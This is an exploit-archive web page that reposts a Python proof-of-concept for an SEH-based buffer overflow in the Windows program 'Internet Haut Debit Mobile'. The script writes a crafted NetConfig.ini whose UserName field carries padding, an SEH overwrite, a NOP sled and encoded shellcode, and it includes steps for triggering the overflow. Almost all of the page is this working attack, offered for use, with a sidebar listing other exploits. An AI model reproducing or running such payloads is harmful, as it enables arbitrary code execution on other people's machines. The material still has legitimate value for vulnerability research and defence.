Internet Haut Debit Mobile Buffer Overflow SEH

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Internet Haut Debit Mobile Buffer Overflow SEH

来源：metacom27 at gmail.com 作者：metacom 发布时间：2013-10-11

#!/usr/bin/python

#Exploit Title:Internet Haut Debit Mobile Buffer Overflow SEH

#Software Link:https://app.box.com/s/4h9cm20hp5iiask8rwrm

#Poc video demo :http://www.youtube.com/watch?v=sAHfjmNHiow&feature=youtu.be

#Version:PCW_MATMARV1.0.0B03

#Date found: 10.10.2013

#Date published:10.10.2013

#Exploit Author: metacom

#RST

#Tested on: Windows XP sp3 En

from struct import pack

file="NetConfig.ini"

print "[*]Copy NetConfig.ini to C:\Program Files\Internet Haut Debit Mobile\n"

print "[*]Open Program Go to (parameter->options)\n"

print "[*]Click Buffer Overflow SEH and press (Vue -> View)\n"

junk="\x41" * 461

nseh="\xeb\x42\x90\x90"

seh=pack('<I',0x0F9A196A)

nops="\x90" * 80

##\x00\x0a\x0d

shellcode=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"

"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"

"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"

"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"

"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"

"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"

"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"

"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"

"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"

"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"

"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"

"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"

"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"

"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"

"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"

"\xea\x47")

header ="\x68\x74\x74\x70\x3a\x2f\x2f"

exploit=header + junk + nseh + seh + nops + shellcode

poc="\x5b\x42\x75\x66\x66\x65\x72\x20\x4f\x76\x65\x72\x66\x6c\x6f\x77\x20\x53\x45\x48\x5d\n"

poc+="\x4e\x61\x6d\x65\x3d" + "\n"

poc+="\x55\x73\x65\x72\x4e\x61\x6d\x65\x3d" + exploit + "\n"

poc+="\x55\x73\x65\x72\x50\x61\x73\x73\x3d" +"\n"

poc+="\x44\x69\x61\x6c\x4e\x75\x6d\x3d\x2a\x39\x39\x23" + "\n"

poc+="\x49\x73\x41\x75\x74\x6f\x47\x65\x74\x41\x50\x4e\x3d\x30" + "\n"

poc+="\x41\x50\x4e\x3d\x77\x77\x77\x2e\x69\x61\x6d\x67\x70\x72\x73\x32\x2e\x6d\x61" + "\n"

poc+="\x49\x73\x41\x75\x74\x6f\x47\x65\x74\x44\x4e\x53\x3d\x31" + "\n"

poc+="\x4d\x61\x69\x6e\x44\x4e\x53\x61\x64\x64\x72\x3d" + "\n"

poc+="\x41\x6c\x74\x44\x4e\x53\x41\x64\x64\x72\x3d" + "\n"

poc+="\x49\x73\x41\x75\x74\x6f\x47\x65\x74\x50\x44\x50\x3d\x31 " + "\n"

poc+="\x70\x64\x70\x41\x64\x64\x72\x3d" + "\n"

poc+="\x70\x64\x70\x54\x79\x70\x65\x3d\x49\x50" + "\n"

poc+="\x41\x75\x74\x68\x54\x79\x70\x65\x3d\x50\x41\x50" + "\n"

poc+="\x61\x73\x6b\x55\x73\x65\x72\x41\x6e\x64\x50\x61\x73\x73\x3d\x30" + "\n"

poc+="\x53\x61\x76\x65\x75\x73\x65\x72\x41\x6e\x64\x50\x61\x73\x73\x3d\x30" + "\n"

poc+="\x49\x73\x46\x61\x63\x74\x6f\x72\x79\x44\x65\x66\x61\x75\x6c\x74\x3d\x31" + "\n"

poc+="\x44\x65\x6e\x69\x45\x64\x69\x74\x44\x65\x6c\x65\x74\x65\x3d\x31" + "\n"

poc+="\x49\x73\x44\x66\x61\x75\x6c\x74\x3d\x31" + "\n"

try:

print "[*]Creating exploit file...\n"

writeFile = open (file, "w")

writeFile.write( poc )

writeFile.close()

raw_input("[*]File successfully created!\nPress Enter")

except:

print "[!] Error while creating file!"

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告